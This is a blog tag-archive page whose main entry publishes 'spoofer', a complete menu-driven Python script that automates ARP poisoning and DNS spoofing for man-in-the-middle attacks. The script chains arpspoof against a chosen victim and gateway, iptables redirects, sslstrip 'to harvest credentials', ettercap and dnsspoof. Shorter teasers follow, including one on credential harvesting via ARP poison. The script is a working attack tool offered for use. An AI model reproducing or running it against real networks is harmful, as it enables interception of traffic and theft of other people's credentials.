Tag Archives for script
Spoofer – Automated arp / dns poisoning
I have knocked up a little menu driven python tool called spoofer. Spoofer takes the leg work out of getting a system set up for man in the middle attacks. Here is the code:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
#!/usr/bin/python # # Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip} # eg: ./spoofer.py waln0 10.0.0.10 10.0.0.1 # # Requirements: # Dnsiff (arpspoof) - sslstrip - ettercap # from os import system, getuid from sys import argv, exit from time import sleep class colours: bold = '\033[1m' red = '\033[31m' green = '\033[32m' reset = '\033[0;0m' def arp_cleanup(): # stop arpspoof print "\n[+] Stopping arpspoof" system('killall arpspoof') sleep(1) # set ip_forward to 0 print "[+] Stopping IPv4 forwarding" system('echo 0 > /proc/sys/net/ipv4/ip_forward') sleep(1) # clear iptables rules print "[+] Flushing iptable rules" system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter) sleep(1) # stop ssl strip print "[+] Stopping sslstrip\n" system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')') sleep(1) exit() def dns_cleanup(): raw_input('\n[+] Hit ENTER to exit') # stop arpspoof print "\n[+] Stopping dnsspoof" system('killall dnsspoof') sleep(2) print "[+] Stopping arpspoof" system('killall arpspoof') sleep(3) # stop dnsspoof # set ip_forward to 0 print "[+] Stopping IPv4 forwarding\n" system('echo 0 > /proc/sys/net/ipv4/ip_forward') sleep(1) exit() if getuid() != 0: print("You need to be root (sudo %s)" % argv[0]) else: if len(argv) < 2: system('clear') print("\nusage: %s adapter" % argv[0]) print("\teg: %s eth0\n" % argv[0]) else: # set some variables adapter = argv[1] spooftype = 0 while spooftype != range(1,3): system('clear') spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ") # arp spoof attack if spooftype == "1": slave = raw_input("\nEnter slave IP: > ") gateway = raw_input("Enter gateway IP: > ") # set rules for traffic forwarding print "\n[+] Setting iptable rules" system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter) sleep(2) # start arp poison on slave / gateway print "[+] Starting arpspoof" system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway)) sleep(2) # start sslstrip to harvest credentials print "[+] Starting sslstrip" system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &') sleep(2) # run ettercap against slave print "[+] Starting ettercap" system('xterm -e ettercap -T -q -i %s &' % adapter) sleep(2) # set ip forward mode system('echo 1 > /proc/sys/net/ipv4/ip_forward') sleep(1) print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset raw_input('\n[+] Hit ENTER to exit') # clean up arp_cleanup() if spooftype == "2": slave = raw_input("\nEnter slave IP: > ") gateway = raw_input("Enter gateway IP: > ") # arp poison slave / gateway print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway)) sleep(2) # set ip forward mode system('echo 1 > /proc/sys/net/ipv4/ip_forward') sleep(1) # start dnsspoof system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave)) #clear up dns_cleanup() |
Spoofer relies on you having … Continue reading
Credential harvesting via ARP poison [UPDATED]
Is it me or when your programming skills improve you find yourself looking back over past programs you created and think to yourself why didn’t I do that like this? I spent a fair few hours over the past weekend … Continue reading
Script to join avi files [UPDATE]
I posted a while ago with a script to join two parts of an avi file, split files are common with downloaded video. I have modified the program so it now uses command line arguments. You can download it here. … Continue reading
Python hash creator
I have knocked up a little python script that takes user input and creates a hash. You have the option of selecting md5, sha1, sha224, sha256, sha384 or sha512. You can download the program from here (right click, save as).